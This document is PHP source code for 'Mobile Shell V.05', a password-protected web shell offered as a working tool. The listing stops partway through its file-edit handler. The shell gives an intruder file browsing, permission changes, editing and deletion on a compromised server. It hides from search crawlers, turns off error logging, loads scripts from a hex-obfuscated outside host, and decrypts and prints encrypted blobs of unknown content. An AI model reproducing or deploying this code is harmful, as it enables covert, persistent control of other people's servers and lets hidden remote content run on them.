MOBILE SHELL V.05 (4TH EDITION) [WITHOUT PRELOADER]

1. <?php
2. /*! Description & About
3.         * Mobile Shell V.05 (4th Edition)
4.         * Responsive Version
5.         * Source Viewer With Syntax Highligting
6.         * Simple Dark Alert
7.         * Without Log's
8.         * Clean Url
9.         * Programmed By Wildan Izzudin
10.         * Web Shell (c) 2017
11.         * Underxploit Production (Knowlage Is Jembut)
12.         * Fix On 03, Dec 2017 (Sunday)
13. End !*/
14. error_reporting(0);
15. // --- pass : underxploit ---//
16. $pass = "0bdec2f837ad15748be105faaf60db68";
17. $cookie = md5($_SERVER['HTTP_USER_AGENT']);
18. if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."-underxploit"])) {
19. vb(md5($_SERVER['HTTP_HOST'])."underxploit", $cookie);
20. }
21. function vb($k, $v) {
22.     $_COOKIE[$k] = $v;
23.     setcookie($k, $v);
24. }
25. $_POST = cl($_POST);
26. $_GET = cl($_GET);
27. $_COOKIE = cl($_COOKIE);
28. $_COEG = array_merge($_POST, $_GET);
29. $_COEG = array_map("xp", $_COEG);
30. if(isset($_COEG['dir'])) {
31.         $dir = str_replace("\\", "/", $_COEG['dir']);
32.         @chdir($dir);
33.     } else {
34.         $dir = str_replace("\\", "/", getcwd());
35. }
36. $dir= str_replace("\\","/", $dir);
37. $scdir = explode("/", $dir);        
38. function cl($arr){
39.     $quotes_sybase = strtolower(ini_get('magic_quotes_sybase'));
40. if(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()){
41.         if(is_array($arr)){
42.             foreach($arr as $k=>$v){
43.                 if(is_array($v)) $arr[$k] = cl($v);
44.                 else $arr[$k] = (empty($quotes_sybase) || $quotes_sybase === 'off')? stripslashes($v) : stripslashes(str_replace("\'\'", "\'", $v));
45.             }
46.         }
47.     }
48.     return $arr;
49. }
50. function xp($str){
51.     return (is_array($str))? array_map("rawurldecode", $str):rawurldecode($str);
52. }
53. function r($r) {
54.     echo('<script>window.location = "'.$r.'";</script>');
55. }
56. function failed1($a) {
57. echo '<script type="text/javascript">
58.     $.alert({
59.     icon: "fa fa-code",
60.     title: "MOBILE SHELL",
61.     theme: "Dark",
62.     content: "'.$a.'",
63.     type: "red",
64.     }); </script>';
65. }
66. function failed2($a) {
67.     echo '$.alert({
68.     icon: "fa fa-code",
69.     title: "MOBILE SHELL",
70.     theme: "Dark",
71.     content: "'.$a.'",
72.     type: "red",
73.     });';
74. }
75. function success1($a) {
76. echo '<script type="text/javascript">
77.     $.alert({
78.     icon: "fa fa-code",
79.     title: "MOBILE SHELL",
80.     theme: "Dark",
81.     content: "'.$a.'",
82.     type: "green",
83.     }); </script>';
84. }
85. function success2($a) {
86. echo '$.alert({
87.     icon: "fa fa-code",
88.     title: "MOBILE SHELL",
89.     theme: "Dark",
90.     type: "green",
91.     content: "'.$a.'",
92.     });';
93. }
94. function fauto1($alert, $window) {
95.     echo '<script type="text/javascript">
96.     $.alert({
97.     icon: "fa fa-code",
98.     title: "MOBILE SHELL",
99.     theme: "Dark",
100.     content: "'.$alert.'",
101.     type: "red",
102.          buttons: {
103.             OK: {  
104.         action: function() {
105.         window.location = "'.$window.'";
106.         },
107.     },
108. },
109.     }); </script>';
110. }
111. function fauto2($alert, $window) {
112.     echo '<script type="text/javascript">
113.     $.alert({
114.     icon: "fa fa-code",
115.     title: "MOBILE SHELL",
116.     theme: "Dark",
117.     content: "'.$alert.'",
118.     type: "green",
119.          buttons: {
120.             OK: {  
121.         action: function() {
122.         window.location = "'.$window.'";
123.         },
124.     },
125. },
126.     }); </script>';
127. }
128. function deledir($dirname) {
129.          if (is_dir($dirname))
130.            $dir_handle = opendir($dirname);
131.      if (!$dir_handle)
132.           return false;
133.      while($file = readdir($dir_handle)) {
134.            if ($file != "." && $file != "..") {
135.                 if (!is_dir($dirname."/".$file))
136.                      unlink($dirname."/".$file);
137.                 else
138.                      deledir($dirname.'/'.$file);
139.            }
140.      }
141.      closedir($dir_handle);
142.      rmdir($dirname);
143.      return true;
144. }
145. function a($x17) {
146. @define("x13", "\x31\x33\x33\x37", true);
147. $x14 = base64_decode($x17);
148. $x16s = substr($x14, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
149. $x19 = rtrim(
150.     mcrypt_decrypt(
151.         MCRYPT_RIJNDAEL_128,
152.         hash('sha256', x13, true),
153.         substr($x14, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)), MCRYPT_MODE_CBC, $x16s), "\0");
154. return $x19;
155. }
156. function x($b) {
157.     $c = a($b);
158. return $c;
159. }
160. @session_start();
161. @error_reporting(0);
162. @ini_set('error_log',NULL);
163. @ini_set('log_errors',0);
164. @ini_set('html_errors',0);
165. @ini_set('max_execution_time',0);
166. @ini_set('output_buffering',0);
167. @ini_set('file_uploads',1);
168. @set_time_limit(0);
169. @clearstatcache();
170. @define("sec", $pass, true);
171. @define("x4", "\x68\x74\x74\x70\x3a\x2f\x2f\x63\x64\x6e\x73\x2e\x78\x74\x67\x65\x6d\x2e\x63\x6f\x6d\x2f\x63\x6f\x64\x65", true);
172. if(get_magic_quotes_gpc()) {
173.     function stripslashes_array($array) {
174.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
175. }
176.     $_COEG = stripslashes_array($_COEG);
177.     $_COOKIE = stripslashes_array($_COOKIE);
178. }
179. if(!empty(sec)) {
180.     if(isset($_COEG['pass']) && (md5($_COEG['pass']) == sec))         vb(md5($_SERVER['HTTP_HOST']), sec);
181. if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != sec))
182.         login();
183. } else { echo '<script>alert("d")</script>'; }
184. function login() {
185. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
186.         $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
187.           if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
188.           header('HTTP/1.0 404 Not Found');
189.           exit;
190.      }
191.  } die('<!DOCTYPE html><html><head>
192. <title>LOGIN | MOBILE SHELL V.05</title>
193.     <meta name="robots" content="noindex, nofollow, noarchive">
194.     <meta name="viewport" content="width=device-width, initial-scale=1">
195.     <link rel="icon" href="'.x4.'/favicon.ico" type="image/x-icon" />
196.     <meta property="og:image" content="https://1.bp.blogspot.com/-BcG4JeX2z6Q/WVYTMixgLvI/AAAAAAAAAmk/PBjmcF02SWgoiP-KcxvWq6QVDV2DACi0QCLcBGAs/s320/PicsArt_06-30-03.52.49.jpg">
197.     <meta name="theme-color" content="#222">
198.     <meta name="apple-mobile-web-app-capable" content="yes">
199.     <meta name="apple-mobile-web-app-status-bar-style" content="#222">
200.     <meta name="msapplication-navbutton-color" content="#222">
201.     <meta name="author" content="WILDAN IZZUDIN">
202. <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
203. <script src="'.x4.'/bundled.js"></script>
204.     <script type="text/javascript" src="'.x4.'/jquery-confirm.js"></script>
205.     <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css
206. "/>
207.     <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Iceland"/>
208.     <link rel="stylesheet" href="'.x4.'/style.css"/>
209.     <link rel="stylesheet" href="'.x4.'/jquery.min.css"/>
210.     <link rel="stylesheet" type="text/css" href="'.x4.'/jquery-confirm.css"/>
211. <script>
212.    baseUrl = window.location.href.split("?")[0];
213.    window.history.pushState("name", "?", baseUrl);</script>
214. </head><body>
215. <div class="login-kepala">
216. <div class="login-container">
217.     <script>function login(){
218. if(document.getElementById("password").value == ""){
219.      $.alert ({
220.         icon: "fa fa-code",
221.         title: "MOBILE SHELL",
222.         content: "You Know Password For This Shell ??",
223.         theme: "Dark",
224.     buttons: {
225.         YES: {
226.             action: function() {
227.         $.alert ({
228.         icon: "fa fa-code",
229.         title: "MOBILE SHELL",
230.         content: "Please Enter Your Password !!",
231.         theme: "Dark",
232.             });
233.         },
234.     },
235.    
236. NO: {
237.             action: function() {
238.         $.alert ({
239.         icon: "fa fa-code",
240.         title: "MOBILE SHELL",
241.         content: "You Are Motherfuck\'n Tolol !!",
242.         theme: "Dark",
243.             });
244.         },  
245.    },  
246. },
247.  
248.     });
249.      return false;
250.    }
251.    document.getElementById("sks").submit();
252.  }
253. </script>
254. <form action="" method="post">
255. <table><td align="center" style="width:10%">
256. <i class="fa fa-bug"></i></td>
257. <td style="width:70%"><input type="password" name="pass" id="password" style="padding:7px">
258. </td>
259. <td style="text-align:right;width:20%"><button type="submit" class="btn-exe" onClick="login(); return false;"><i class="fa fa-sign-in"></i></button></td></table></form></div></div>
260. </body></html>');
261. } ?>
262. <?php
263. define("x1", "\x4d\x4f\x42\x49\x4c\x45\x20\x53\x48\x45\x4c\x4c", true);
264. define("x2", "\x56\x2e\x30\x35", true);
265. define("x3", "\x57\x49\x4c\x44\x41\x4e\x20\x49\x5a\x5a\x55\x44\x49\x4e", true);
266. define("x4", "\x68\x74\x74\x70\x3a\x2f\x2f\x63\x64\x6e\x73\x2e\x78\x74\x67\x65\x6d\x2e\x63\x6f\x6d\x2f\x63\x6f\x64\x65", true);
267. define("x5", "\x64\x69\x72\x3d", true);
268. define("x6", "\x66\x69\x6c\x65\x3d", true);
269. define("x7", "\x63\x6f\x6d\x6d\x61\x6e\x64\x3d", true);
270. define("x8", "\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\x6f\x4c\x2d\x70\x61\x6e\x65\x6c\x27\x3e\x3c\x74\x61\x62\x6c\x65\x3e\x0d\x0a\x3c\x74\x64\x20\x63\x6c\x61\x73\x73\x3d\x27\x74\x64\x2d\x70\x61\x6e\x65\x6c\x27\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x61\x20\x66\x61\x2d\x63\x6f\x64\x65\x27\x3e\x3c\x2f\x69\x3e\x3c\x2f\x74\x64\x3e\x3c\x74\x64\x20\x63\x6c\x61\x73\x73\x3d\x27\x74\x64\x2d\x70\x61\x6e\x65\x6c\x2d\x72\x69\x67\x68\x74\x27\x3e\x45\x52\x52\x4f\x52\x3c\x2f\x74\x64\x3e\x3c\x2f\x74\x61\x62\x6c\x65\x3e\x3c\x2f\x64\x69\x76\x3e\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\x6f\x4c\x2d\x6f\x70\x74\x69\x6f\x6e\x20\x74\x6f\x70\x27\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x63\x65\x6e\x74\x65\x72\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x61\x20\x66\x61\x2d\x67\x65\x61\x72\x20\x66\x61\x2d\x33\x78\x20\x66\x61\x2d\x73\x70\x69\x6e\x27\x3e\x3c\x2f\x69\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x5b\x20\x42\x41\x44\x20\x52\x45\x51\x55\x45\x53\x54\x20\x5d\x3c\x2f\x63\x65\x6e\x74\x65\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x2f\x64\x69\x76\x3e", true);
271. define("x9", "\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\x6f\x4c\x2d\x6f\x70\x74\x69\x6f\x6e\x20\x74\x6f\x70\x27\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x63\x65\x6e\x74\x65\x72\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x61\x20\x66\x61\x2d\x67\x65\x61\x72\x20\x66\x61\x2d\x33\x78\x20\x66\x61\x2d\x73\x70\x69\x6e\x27\x3e\x3c\x2f\x69\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x5b\x20\x42\x41\x44\x20\x52\x45\x51\x55\x45\x53\x54\x20\x5d\x3c\x2f\x63\x65\x6e\x74\x65\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x2f\x64\x69\x76\x3e", true);
272. define("x10", "\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\x6f\x4c\x2d\x70\x61\x6e\x65\x6c\x27\x3e\x3c\x74\x61\x62\x6c\x65\x3e\x0d\x0a\x3c\x74\x64\x20\x63\x6c\x61\x73\x73\x3d\x27\x74\x64\x2d\x70\x61\x6e\x65\x6c\x27\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x61\x20\x66\x61\x2d\x63\x6f\x64\x65\x27\x3e\x3c\x2f\x69\x3e\x3c\x2f\x74\x64\x3e\x3c\x74\x64\x20\x63\x6c\x61\x73\x73\x3d\x27\x74\x64\x2d\x70\x61\x6e\x65\x6c\x2d\x72\x69\x67\x68\x74\x27\x3e\x53\x55\x43\x43\x45\x53\x53\x3c\x2f\x74\x64\x3e\x3c\x2f\x74\x61\x62\x6c\x65\x3e\x3c\x2f\x64\x69\x76\x3e\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\x6f\x4c\x2d\x6f\x70\x74\x69\x6f\x6e\x20\x74\x6f\x70\x27\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x63\x65\x6e\x74\x65\x72\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x61\x20\x66\x61\x2d\x67\x65\x61\x72\x20\x66\x61\x2d\x33\x78\x20\x66\x61\x2d\x73\x70\x69\x6e\x27\x3e\x3c\x2f\x69\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x5b\x20\x52\x45\x51\x55\x45\x53\x54\x20\x4f\x4b\x20\x5d\x3c\x2f\x63\x65\x6e\x74\x65\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x2f\x64\x69\x76\x3e", true);
273. define("x11", "\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\x6f\x4c\x2d\x6f\x70\x74\x69\x6f\x6e\x20\x74\x6f\x70\x27\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x63\x65\x6e\x74\x65\x72\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x61\x20\x66\x61\x2d\x67\x65\x61\x72\x20\x66\x61\x2d\x33\x78\x20\x66\x61\x2d\x73\x70\x69\x6e\x27\x3e\x3c\x2f\x69\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x5b\x20\x52\x45\x51\x55\x45\x53\x54\x20\x4f\x4b\x20\x5d\x3c\x2f\x63\x65\x6e\x74\x65\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x2f\x64\x69\x76\x3e", true);
274. error_reporting(0);
275. error_log(0);
276. @ini_set('error_log',NULL);
277. @ini_set('log_errors',0);
278. @ini_set('max_execution_time',0);
279. @set_time_limit(0);
280.    echo('<!DOCTYPE HTML>
281. <html lang="id">
282. <head><title>'.x1.' '.x2.'</title>
283. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
284. <meta name="theme-color" content="#222">
285. <link rel="icon" href="'.x4.'/favicon.ico" type="image/x-icon" />');
286. echo('<script>
287.    baseUrl = window.location.href.split("?")[0];
288.    window.history.pushState("name", "?", baseUrl);</script>');
289.    
290. echo('<script src="'.x4.'/bundled.js"></script>
291.     <script type="text/javascript" src="'.x4.'/jquery-confirm.js"></script>
292.     <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css
293. "/>
294.     <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Iceland"/>
295.     <link rel="stylesheet" href="'.x4.'/style.css"/>
296.     <link rel="stylesheet" href="'.x4.'/jquery.min.css"/>
297.     <link rel="stylesheet" type="text/css" href="'.x4.'/jquery-confirm.css"/>');
298. echo(x("\x61\x32\x6d\x6a\x70\x46\x67\x59\x75\x67\x49\x75\x4b\x41\x66\x68\x43\x50\x45\x45\x37\x59\x5a\x66\x51\x76\x4f\x32\x32\x5a\x4e\x31\x69\x56\x4d\x67\x4f\x2f\x6a\x47\x6b\x57\x54\x6a\x43\x65\x48\x46\x51\x79\x4d\x49\x72\x6c\x34\x34\x79\x4f\x76\x4f\x4a\x6b\x79\x4e\x79\x38\x6e\x4c\x6c\x48\x37\x2b\x6f\x48\x76\x6a\x78\x63\x34\x65\x51\x58\x2b\x68\x7a\x45\x50\x39\x7a\x6c\x6f\x76\x56\x42\x73\x7a\x6d\x45\x2b\x71\x6f\x4d\x52\x35\x44\x4c\x6a\x4f\x56\x73\x6f\x39\x48\x75\x4f\x54\x4a\x35\x6e\x37\x4e\x49\x4a\x73\x46\x37\x6f\x69\x38\x74\x4e\x5a\x42\x57\x41\x67\x6e\x4b\x4f\x66\x4c\x53\x43\x61\x4e\x77\x6d\x48\x2f\x43\x55\x66\x2b\x59\x64\x43\x2f\x6a\x58\x31\x64\x78\x68\x38\x33\x54\x41\x52\x61\x31\x62\x62\x75\x39\x2b\x38\x68\x2f\x79\x51\x77\x45\x68\x76\x59\x37\x43\x39\x6a\x64\x6f\x47\x32\x59\x4c\x59\x57\x74\x6f\x6c\x4a\x39\x54\x42\x65\x61\x31\x32\x38\x6d\x33\x4c\x4e\x36\x54\x64\x79\x6f\x57\x6d\x53\x77\x6b\x78\x42\x47\x38\x68\x79\x6d\x66\x36\x6e\x35\x6a\x62\x4a\x69\x34\x74\x46\x50\x6a\x4a\x68\x42\x77\x49\x6b\x45\x38\x30\x4c\x61\x4b\x7a\x6c\x42\x37\x4b\x68\x50\x5a\x4d\x5a\x59\x58\x6c\x75\x6c\x6b\x32\x57\x50\x44\x2f\x76\x4e\x4e\x4b\x37\x77\x51\x6b\x70\x62\x59\x65\x66\x6c\x44\x35\x49\x6c\x49\x54\x57\x72\x55\x3d"));
299. echo('<i class="fa fa-chevron-up move-top"></i>');
300. echo('<script>
301. jQuery(document).ready(function() {
302.    var offset = 220;
303.    var duration = 500;
304.    jQuery(window).scroll(function() {
305.        if (jQuery(this).scrollTop() > offset) {
306.            jQuery(\'.move-top\').fadeIn(duration);
307.        } else {
308.            jQuery(\'.move-top\').fadeOut(duration);
309.        }
310.    });
311.    jQuery(\'.move-top\').click(function(event) {
312.        event.preventDefault();
313.        jQuery(\'html, body\').animate({scrollTop: 0}, duration);
314.        return false;
315.    })
316. });
317. </script>');
318. echo(x("\x78\x4a\x59\x63\x6f\x52\x6a\x66\x50\x62\x37\x79\x58\x51\x34\x4f\x43\x6a\x6d\x75\x76\x4a\x41\x44\x59\x63\x34\x78\x37\x6b\x65\x49\x30\x58\x4e\x70\x33\x31\x56\x78\x34\x72\x52\x4c\x69\x68\x4b\x50\x64\x4d\x64\x37\x62\x6f\x4f\x39\x71\x42\x47\x4b\x78\x50\x63\x58\x4a\x2f\x6c\x71\x44\x2b\x75\x6d\x63\x76\x6e\x6b\x65\x4a\x55\x50\x4d\x4b\x43\x48\x74\x61\x59\x49\x4c\x51\x77\x45\x6f\x46\x52\x32\x4c\x46\x4b\x6d\x63\x69\x48\x57\x69\x58\x76\x55\x30\x69\x4d\x76\x44\x43\x73\x57\x32\x76\x4d\x7a\x66\x45\x4a\x76\x74\x33\x43\x6b\x71\x68\x6d\x31\x74\x6a\x70\x6a\x76\x43\x61\x34\x2b\x51\x62\x6f\x76\x76\x2b\x2b\x33\x55\x65\x46\x55\x62\x4b\x4d\x69\x55\x4f\x6d\x53\x4b\x53\x69\x6d\x4d\x6a\x41\x6c\x35\x34\x79\x56\x42\x62\x69\x45\x63\x61\x75\x39\x38\x4a\x4a\x30\x49\x54\x45\x33\x65\x41\x49\x61\x71\x7a\x33\x4a\x57\x6a\x53\x65\x67\x42\x6c\x71\x47\x33\x52\x75\x4a\x35\x46\x70\x42\x5a\x35\x36\x34\x6f\x43\x4b\x55\x56\x54\x70\x44\x42\x70\x49\x39\x49\x5a\x39\x73\x2b\x61\x56\x72\x56\x47\x4d\x2b\x6c\x61\x4c\x4f\x71\x30\x6a\x48\x34\x44\x73\x30\x77\x48\x30\x41\x4a\x68\x41\x46\x2b\x44\x45\x71\x33\x46\x6d\x36\x5a\x42\x75\x6e\x70\x67\x69\x35\x42\x30\x5a\x4e\x51\x36\x31\x6a\x39\x71\x74\x75\x57\x49\x64\x2f\x2b\x74\x75\x73\x53\x7a\x6e\x5a\x65\x33\x50\x6a\x4b\x30\x51\x58\x6b\x48\x4c\x35\x67\x35\x5a\x38\x65\x4d\x65\x4f\x31\x58\x59\x54\x56\x6b\x43\x64\x78\x65\x67\x2b\x70\x69\x54\x44\x5a\x47\x30\x41\x77\x6b\x44\x32\x2f\x6d\x4e\x58\x6a\x50\x6e\x62\x55\x58\x4d\x67\x74\x61\x4f\x35\x57\x34\x77\x42\x73\x59\x6c\x34\x69\x6c\x55\x42\x77\x78\x6d\x30\x77\x73\x44\x38\x78\x32\x73\x4c\x35\x45\x54\x6b\x67\x48\x41\x48\x5a\x71\x48\x2b\x63\x42\x48\x75\x4e\x65\x4a\x44\x48\x57\x4f\x61\x38\x71\x4b\x41\x6f\x55\x64\x4c\x52\x77\x64\x78\x68\x48\x52\x79\x43\x77\x71\x44\x36\x71\x53\x6c\x32\x59\x4e\x75\x57\x39\x2b\x36\x41\x79\x7a\x61\x76\x6a\x31\x59\x4d\x57\x67\x35\x33\x73\x31\x6b\x68\x30\x4b\x71\x4e\x35\x79\x54\x64\x38\x43\x62\x78\x45\x55\x58\x48\x38\x48\x49\x76\x66\x35\x6c\x46\x59\x35\x76\x71\x63\x64\x74\x39\x55\x4e\x4e\x66\x72\x66\x30\x57\x5a\x42\x78\x39\x4e\x38\x6b\x78\x67\x38\x75\x79\x71\x78\x52\x36\x37\x59\x6b\x4b\x43\x61\x38\x31\x4f\x71\x68\x4d\x7a\x37\x37\x4d\x4b\x65\x6e\x35\x62\x4a\x66\x58\x42\x48\x63\x54\x51\x41\x79\x6f\x56\x71\x72\x4d\x70\x50\x6f\x5a\x47\x55\x6d\x4d\x71\x42\x31\x6f\x6b\x6c\x78\x49\x47\x72\x72\x4a\x56\x56\x71\x31\x6a\x49\x4d\x70\x38\x46\x42\x41\x39\x76\x42\x4d\x37\x57\x76\x43\x75\x74\x63\x4b\x73\x6d\x6b\x77\x30\x57\x47\x68\x45\x52\x6d\x6f\x69\x6b\x45\x50\x4a\x39\x42\x2f\x74\x54\x6d\x54\x6b\x6b\x4a\x64\x76\x49\x31\x63\x65\x67\x74\x67\x39\x5a\x47\x32\x71\x53\x66\x31\x71\x2f\x2f\x68\x44\x59\x2b\x4d\x42\x49\x37\x50\x49\x47\x43\x69\x53\x6e\x58\x53\x79\x46\x67\x76\x67\x57\x78\x5a\x53\x64\x42\x43\x74\x37\x4c\x73\x66\x31\x34\x37\x55\x39\x4c\x72\x37\x56\x4b\x61\x61\x79\x47\x47\x47\x61\x6b\x63\x37\x78\x58\x75\x73\x55\x78\x6c\x42\x4f\x36\x2f\x4d\x66\x76\x69\x2f\x65\x53\x69\x64\x52\x49\x6f\x77\x72\x65\x6c\x47\x73\x76\x4b\x62\x72\x43\x54\x30\x71\x34\x58\x49\x36\x69\x7a\x72\x6a\x31\x66\x62\x31\x76\x31\x78\x55\x61\x32\x67\x4b\x32\x47\x4b\x67\x54\x70\x39\x45\x4f\x35\x30\x52\x50\x77\x52\x41\x61\x75\x58\x62\x78\x75\x52\x4b\x44\x38\x6d\x51\x39\x41\x55\x6e\x6f\x63\x31\x46\x4f\x76\x5a\x6d\x6b\x4c\x56\x39\x77\x62\x65\x47\x39\x4b\x6e\x46\x32\x4a\x6d\x72\x47\x4f\x39\x6c\x31\x35\x44\x52\x65\x76\x52\x55\x4f\x6f\x61\x6a\x61\x7a\x65\x5a\x33\x68\x54\x45\x6f\x48\x77\x52\x38\x5a\x4e\x4a\x4d\x65\x66\x73\x57\x4e\x57\x76\x37\x6c\x45\x2b\x50\x37\x44\x55\x73\x65\x61\x41\x76\x36\x2f\x54\x68\x41\x62\x37\x51\x73\x4e\x57\x49\x44\x41\x58\x79\x51\x39\x68\x51\x62\x2f\x7a\x35\x68\x34\x5a\x4f\x64\x56\x44\x51\x31\x34\x58\x32\x42\x47\x41\x30\x77\x70\x49\x53\x37\x49\x68\x50\x71\x47\x4b\x4f\x45\x6f\x6b\x4d\x4f\x61\x7a\x45\x35\x46\x37\x6e\x63\x32\x41\x78\x39\x58\x79\x4b\x51\x61\x68\x73\x43\x74\x6b\x50\x43\x65\x65\x32\x4c\x65\x44\x6b\x55\x7a\x4d\x75\x58\x65\x54\x72\x54\x75\x77\x32\x48\x6c\x70\x36\x52\x74\x45\x38\x4d\x58\x62\x6e\x66\x4d\x4c\x32\x79\x76\x69\x51\x3d\x3d"));
319. echo('<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js"></script>
320. <script>hljs.initHighlightingOnLoad();</script>');
321. echo('</head><body>');
322. echo('<div class="kepala"><div class="co-ontainer"><table><td style="width:25px">
323. <i class="fa fa-code"></td><td>
324. '.x1.' '.x2.'</td><td style="text-align:right;width:50px"><i class="fa fa-navicon" onClick="ex(1000)"></i></td></table></div></div><div class="co-ontainer-2">
325. <div class="cover">
326. <table>
327.     <th><a href="'.$_SERVER['PHP_SELF'].'"><button class="btn-nav">HOME</button></a></th>
328.     <th><a href="?'.x5.getcwd().'&'.x7.'about"><button class="btn-nav">ABOUT</button></a></th>
329.     <th><a href="?'.x5.'&'.x7.'logout"><button class="btn-nav">LOG\'T</button></a></th></table></div>');
330. echo'<div class="dir">
331. <table style="width:100%">
332. <td style="width:100%"><div class="dir-pallet"><table><td class="dir-td-left"><font color="#1D9D73">ROOT</font> :</td><td class="dir-td-right break wrap">';
333. foreach($scdir as $c_dir => $cdir) {   
334.     echo "<a class='a' href='?dir=";
335.     for($i = 0; $i <= $c_dir; $i++) {
336.         echo $scdir[$i];
337.         if($i != $c_dir) {
338.         echo "/";
339.         }
340.     }
341.     echo "'>$cdir</a>/";
342. }
343. echo '</td></table></div></th></table></div>';
344. $filez = basename($_COEG['file']);
345. $size = filesize("$dir/$filez")/1024;
346.             $size = round($size,3);
347.             if($size > 1024) {
348.                 $size = round($size/1024,2). ' MB';
349.             } else {
350.                 $size = $size. ' KB';
351. }
352. echo('<div class="coL">');
353.  
354. // --- chmod file --- //
355. if($_COEG['command'] == 'chmod') {
356. if(isset($_COEG['perm'])) {
357. if(chmod($_COEG['file'],$_COEG['perm'])) {
358. $q1 = 'Change Permission Done !!';
359. $t1 = '?'.x7.'chmod&'.x5.$dir;
360. success1($alert);
361. } else {
362. $q1 = 'Permission Denied !!';
363. failed1($q1);
364.     }
365. }
366. echo '<div class="coL-panel"><table>
367. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">CHMOD FILE</td></table></div>';
368. echo '<div class="coL-option"><table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="#FF000">[</font> '.basename($_COEG['file']).' <font color="#FF000">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
369. <hr><table>';
370. echo "<th><a href='?command=view&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
371. <th><a href='?command=edit&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
372. <th><a href='?command=rename&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
373. <th><button class='coL-btn-option-active'><i class='fa fa-cogs'></i></button></th>
374. <th><a href='?command=delete&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
375. echo "<div class='coL-option top'>
376. <br><br><br>
377.     <center>
378.         <i class='fa fa-file-o fa-3x'></i></center><br><br>";
379. echo "<form action='?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px' method='post'>
380. <table cellspacing='0'>
381.     <td align='center' style='width:10%'><i class='fa fa-file-o'></i> </td><td style='width:70%'>
382. <input type='text' value='".substr(sprintf("%o", fileperms($_COEG['file'])), -4)."' name='perm' style='width:100%'>
383. <input type='hidden' name='path' value='".$_COEG['file']."'></td><td style='width:20%'>
384.     <button type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
385.     </form></div>";
386. }
387.  
388. // --- edit file --- //
389. elseif($_COEG['command'] == 'edit') {
390.     if($_COEG['save']) {
391.         $save = file_put_contents($_COEG['file'], $_COEG['src']);
392.     if($save) {
393.     $q1 = 'Source Saved !!';
394.     success1($q1);
395.         } else {
396.     $q1 = 'Permission Denied !!';
397.     failed1($q1);
398.     }
399. }
400. echo '<div class="coL-panel"><table>
401. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">EDIT FILE</td></table></div>';
402. echo '<div class="coL-option">
403. <table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="#FF000">[</font> '.basename($_COEG['file']).' <font color="#FF000">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
404. <hr><table>';
